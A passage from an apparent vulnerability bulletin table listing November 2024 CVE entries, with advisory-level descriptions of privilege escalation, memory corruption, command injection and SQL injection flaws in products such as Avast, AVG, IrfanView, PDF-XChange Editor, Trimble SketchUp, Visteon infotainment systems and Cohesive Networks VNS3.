Malwarebytes Antimalware Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Malwarebytes Antimalware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Malwarebytes service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22321. | 2024-11-22 | not yet calculated | CVE-2024-6260 |
| n/a -- n/a |
IrfanView RLE File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of RLE files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23159. | 2024-11-22 | not yet calculated | CVE-2024-6815 |
| n/a -- n/a |
IrfanView PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23214. | 2024-11-22 | not yet calculated | CVE-2024-6816 |
| n/a -- n/a |
IrfanView PSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23216. | 2024-11-22 | not yet calculated | CVE-2024-6817 |
| n/a -- n/a |
IrfanView PSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23217. | 2024-11-22 | not yet calculated | CVE-2024-6818 |
| n/a -- n/a |
IrfanView PSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23219. | 2024-11-22 | not yet calculated | CVE-2024-6819 |
| n/a -- n/a |
IrfanView AWD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of AWD files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23232. | 2024-11-22 | not yet calculated | CVE-2024-6820 |
| n/a -- n/a |
IrfanView CIN File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CIN files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23260. | 2024-11-22 | not yet calculated | CVE-2024-6821 |
| n/a -- n/a |
IrfanView CIN File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CIN files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23261. | 2024-11-22 | not yet calculated | CVE-2024-6822 |
| n/a -- n/a |
G DATA Total Security Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of G DATA Total Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of autostart tasks. The issue results from incorrect permissions set on folders. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22629. | 2024-11-22 | not yet calculated | CVE-2024-6871 |
| n/a -- n/a |
SQL Injection: Hibernate vulnerability in Teknogis Informatics Closed Circuit Vehicle Tracking Software allows SQL Injection, Blind SQL Injection.This issue affects Closed Circuit Vehicle Tracking Software: through 21.11.2024. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-21 | not yet calculated | CVE-2024-7026 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kion Computer KION Exchange Programs Software allows Reflected XSS.This issue affects KION Exchange Programs Software: before 1.21.9092.29966. | 2024-11-21 | not yet calculated | CVE-2024-7130 |
| n/a -- n/a |
Avast Free Antivirus AvastSvc Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avast Free Antivirus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22272. | 2024-11-22 | not yet calculated | CVE-2024-7227 |
| n/a -- n/a |
Avast Free Antivirus Link Following Denial-of-Service Vulnerability. This vulnerability allows local attackers to create a denial-of-service condition on affected installations of Avast Free Antivirus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Service. By creating a symbolic link, an attacker can abuse the service to create a folder. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-22806. | 2024-11-22 | not yet calculated | CVE-2024-7228 |
| n/a -- n/a |
Avast Cleanup Premium Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avast Cleanup Premium. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Cleanup Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22892. | 2024-11-22 | not yet calculated | CVE-2024-7229 |
| n/a -- n/a |
Avast Cleanup Premium Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avast Cleanup Premium. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Cleanup Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22893. | 2024-11-22 | not yet calculated | CVE-2024-7230 |
| n/a -- n/a |
Avast Cleanup Premium Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avast Cleanup Premium. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Cleanup Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22894. | 2024-11-22 | not yet calculated | CVE-2024-7231 |
| n/a -- n/a |
Avast Free Antivirus AvastSvc Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avast Free Antivirus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Service. By creating a symbolic link, an attacker can abuse the service to delete a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22963. | 2024-11-22 | not yet calculated | CVE-2024-7232 |
| n/a -- n/a |
Avast Free Antivirus AvastSvc Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Avast Free Antivirus. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Avast Service. By creating a symbolic link, an attacker can abuse the service to delete a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23731. | 2024-11-22 | not yet calculated | CVE-2024-7233 |
| n/a -- n/a |
AVG AntiVirus Free AVGSvc Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of AVG AntiVirus Free. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the AVG Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22260. | 2024-11-22 | not yet calculated | CVE-2024-7234 |
| n/a -- n/a |
AVG AntiVirus Free Link Following Denial-of-Service Vulnerability. This vulnerability allows local attackers to create a denial-of-service condition on affected installations of AVG AntiVirus Free. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the AVG Service. By creating a symbolic link, an attacker can abuse the service to create a folder. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. . Was ZDI-CAN-22803. | 2024-11-22 | not yet calculated | CVE-2024-7235 |
| n/a -- n/a |
AVG AntiVirus Free icarus Arbitrary File Creation Denial of Service Vulnerability. This vulnerability allows local attackers to create a denial-of-service condition on affected installations of AVG AntiVirus Free. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the AVG Installer. By creating a symbolic link, an attacker can abuse the update functionality to create a file. An attacker can leverage this vulnerability to create a persistent denial-of-service condition on the system. Was ZDI-CAN-22942. | 2024-11-22 | not yet calculated | CVE-2024-7236 |
| n/a -- n/a |
AVG AntiVirus Free AVGSvc Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of AVG AntiVirus Free. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the AVG Service. By creating a symbolic link, an attacker can abuse the service to delete a folder. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22960. | 2024-11-22 | not yet calculated | CVE-2024-7237 |
| n/a -- n/a |
VIPRE Advanced Security SBAMSvc Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of VIPRE Advanced Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Anti Malware Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22238. | 2024-11-22 | not yet calculated | CVE-2024-7238 |
| n/a -- n/a |
VIPRE Advanced Security Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of VIPRE Advanced Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Anti Malware Service. By creating a symbolic link, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-22314. | 2024-11-22 | not yet calculated | CVE-2024-7239 |
| n/a -- n/a |
F-Secure Total Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of F-Secure Total. User interaction on the part of an administrator is required to exploit this vulnerability. The specific flaw exists within the WithSecure plugin hosting service. By creating a symbolic link, an attacker can abuse the service to create a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23005. | 2024-11-22 | not yet calculated | CVE-2024-7240 |
| n/a -- n/a |
Panda Security Dome Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Dome. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the PSANHost service. By creating a junction, an attacker can abuse the service to create an arbitrary file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23375. | 2024-11-22 | not yet calculated | CVE-2024-7241 |
| n/a -- n/a |
NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within nxnode.exe. The process loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. . Was ZDI-CAN-24039. | 2024-11-22 | not yet calculated | CVE-2024-7253 |
| n/a -- n/a |
PDF-XChange Editor PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23550. | 2024-11-22 | not yet calculated | CVE-2024-7352 |
| n/a -- n/a |
ChargePoint Home Flex Bluetooth Low Energy Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of ChargePoint Home Flex charging devices. User interaction is required to exploit this vulnerability. The specific flaw exists within the Wi-Fi setup logic. By connecting to the device over Bluetooth Low Energy during the setup process, an attacker can obtain Wi-Fi credentials. An attacker can leverage this vulnerability to disclose credentials and gain access to the device owner's Wi-Fi network. Was ZDI-CAN-21454. | 2024-11-22 | not yet calculated | CVE-2024-7391 |
| n/a -- n/a |
ChargePoint Home Flex Bluetooth Low Energy Denial-of-Service Vulnerability. This vulnerability allows network-adjacent attackers to create a denial-of-service condition on affected installations of ChargePoint Home Flex charging devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the connection handling of the Bluetooth Low Energy interface. The issue results from limiting the number of active connections to the product. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-21455. | 2024-11-22 | not yet calculated | CVE-2024-7392 |
| n/a -- n/a |
Trimble SketchUp Viewer SKP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-19575. | 2024-11-22 | not yet calculated | CVE-2024-7508 |
| n/a -- n/a |
Trimble SketchUp SKP File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-19576. | 2024-11-22 | not yet calculated | CVE-2024-7509 |
| n/a -- n/a |
Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SKP files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-19631. | 2024-11-22 | not yet calculated | CVE-2024-7510 |
| n/a -- n/a |
Trimble SketchUp Pro SKP File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Trimble SketchUp Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSD files embedded in SKP files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-23000. | 2024-11-22 | not yet calculated | CVE-2024-7511 |
| n/a -- n/a |
A command injection vulnerability in Brocade Fabric OS before 9.2.0c, and 9.2.1 through 9.2.1a on IP extension platforms could allow a local authenticated attacker to perform a privileged escalation via crafted use of the portcfg command. This specific exploitation is only possible on IP Extension platforms: Brocade 7810, Brocade 7840, Brocade 7850 and on Brocade X6 or X7 directors with an SX-6 Extension blade installed. The attacker must be logged into the switch via SSH or serial console to conduct the attack. | 2024-11-21 | not yet calculated | CVE-2024-7517 |
| n/a -- n/a |
SMARTBEAR SoapUI unpackageAll Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of SMARTBEAR SoapUI. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the unpackageAll function. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-19060. | 2024-11-22 | not yet calculated | CVE-2024-7565 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Firmanet Software ERP allows SQL Injection.This issue affects ERP: through 22.11.2024. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-22 | not yet calculated | CVE-2024-7837 |
| n/a -- n/a |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Special Minds Design and Software e-Commerce allows SQL Injection.This issue affects e-Commerce: before 22.11.2024. | 2024-11-22 | not yet calculated | CVE-2024-7882 |
| n/a -- n/a |
Nikon NEF Codec Thumbnail Provider NRW File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nikon NEF Codec. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of NRW files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-19873. | 2024-11-22 | not yet calculated | CVE-2024-8025 |
| n/a -- n/a |
The Alphabetical List WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack | 2024-11-21 | not yet calculated | CVE-2024-8157 |
| n/a -- n/a |
Visteon Infotainment System DeviceManager iAP Serial Number SQL Injection Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment system. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DeviceManager. When parsing the iAP Serial number, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20112. | 2024-11-22 | not yet calculated | CVE-2024-8355 |
| n/a -- n/a |
Visteon Infotainment VIP MCU Code Insufficient Validation of Data Authenticity Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Visteon Infotainment systems. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the firmware update process of the VIP microcontroller. The process does not properly verify authenticity of the supplied firmware image before programming it into internal memory. An attacker can leverage this vulnerability to escalate privileges execute arbitrary code in the context of the VIP MCU. Was ZDI-CAN-23758. | 2024-11-22 | not yet calculated | CVE-2024-8356 |
| n/a -- n/a |
Visteon Infotainment App SoC Missing Immutable Root of Trust in Hardware Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Visteon Infotainment systems. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the configuration of the application system-on-chip (SoC). The issue results from the lack of properly configured hardware root of trust. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the boot process. Was ZDI-CAN-23759. | 2024-11-22 | not yet calculated | CVE-2024-8357 |
| n/a -- n/a |
Visteon Infotainment UPDATES_ExtractFile Command Injection Remote Code Execution Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment systems. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UPDATES_ExtractFile function. A crafted software update file can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-23422. | 2024-11-22 | not yet calculated | CVE-2024-8358 |
| n/a -- n/a |
Visteon Infotainment REFLASH_DDU_FindFile Command Injection Remote Code Execution Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment systems. Authentication is not required to exploit this vulnerability. The specific flaw exists within the REFLASH_DDU_FindFile function. A crafted software update file can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-23420. | 2024-11-22 | not yet calculated | CVE-2024-8359 |
| n/a -- n/a |
Visteon Infotainment REFLASH_DDU_ExtractFile Command Injection Remote Code Execution Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment systems. Authentication is not required to exploit this vulnerability. The specific flaw exists within the REFLASH_DDU_ExtractFile function. A crafted software update file can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-23421. | 2024-11-22 | not yet calculated | CVE-2024-8360 |
| n/a -- n/a |
Improper Validation of Specified Type of Input vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5-ENET versions 1.100 and later and FX5-ENET/IP versions 1.100 to 1.104 allows a remote attacker to cause a Denial of Service condition in Ethernet communication of the products by sending specially crafted SLMP packets. | 2024-11-19 | not yet calculated | CVE-2024-8403 |
| n/a -- n/a |
An unrestricted upload of file with dangerous type in Automated Logic WebCTRL 7.0 could allow an unauthenticated user to perform remote command execution via a crafted HTTP POST request which could lead to uploading a malicious file. | 2024-11-21 | not yet calculated | CVE-2024-8525 |
| n/a -- n/a |
A vulnerability in Automated Logic WebCTRL 7.0 could allow an attacker to send a maliciously crafted URL, which when visited by an authenticated WebCTRL user, could result in the redirection of the user to a malicious webpage via "index.jsp" | 2024-11-21 | not yet calculated | CVE-2024-8526 |
| n/a -- n/a |
Execution with Unnecessary Privileges, : Improper Protection of Alternate Path vulnerability in TR7 Application Security Platform (ASP) allows Privilege Escalation, -Privilege Abuse.This issue affects Application Security Platform (ASP): v1.4.25.188. | 2024-11-18 | not yet calculated | CVE-2024-8781 |
| n/a -- n/a |
BlueZ HID over GATT Profile Improper Access Control Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of BlueZ. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the HID over GATT Profile. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25177. | 2024-11-22 | not yet calculated | CVE-2024-8805 |
| n/a -- n/a |
Cohesive Networks VNS3 Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cohesive Networks VNS3. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 8000 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24160. | 2024-11-22 | not yet calculated | CVE-2024-8806 |
| n/a -- n/a |
Cohesive Networks VNS3 Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cohesive Networks VNS3. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 8000 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24176. | 2024-11-22 | not yet calculated | CVE-2024-8807 |
| n/a -- n/a |
Cohesive Networks VNS3 Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cohesive Networks VNS3. Authentication is required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 8000 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24177. | 2024-11-22 | not yet calculated | CVE-2024-8808 |
| n/a -- n/a |
Cohesive Networks VNS3 Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cohesive Networks VNS3. Authentication is required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 8000 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24178. | 2024-11-22 | not yet calculated | CVE-2024-8809 |
| n/a -- n/a |
WinZip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archive files. When opening an archive that bears the Mark-of-the-Web, WinZip removes the Mark-of-the-Web from the archive file. Following extraction, the extracted files also lack the Mark-of-the-Web. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user. Was ZDI-CAN-23983. | 2024-11-22 | not yet calculated | CVE-2024-8811 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24207. | 2024-11-22 | not yet calculated | CVE-2024-8812 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24208. | 2024-11-22 | not yet calculated | CVE-2024-8813 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24209. | 2024-11-22 | not yet calculated | CVE-2024-8814 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24210. | 2024-11-22 | not yet calculated | CVE-2024-8815 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Use-After-Free Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24211. | 2024-11-22 | not yet calculated | CVE-2024-8816 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24212. | 2024-11-22 | not yet calculated | CVE-2024-8817 |
| n/a -- n/a |
PDF-XChange Editor U3D File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of U3D files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24213. | 2024-11-22 | not yet calculated | CVE-2024-8818 |
| n/a -- n/a |
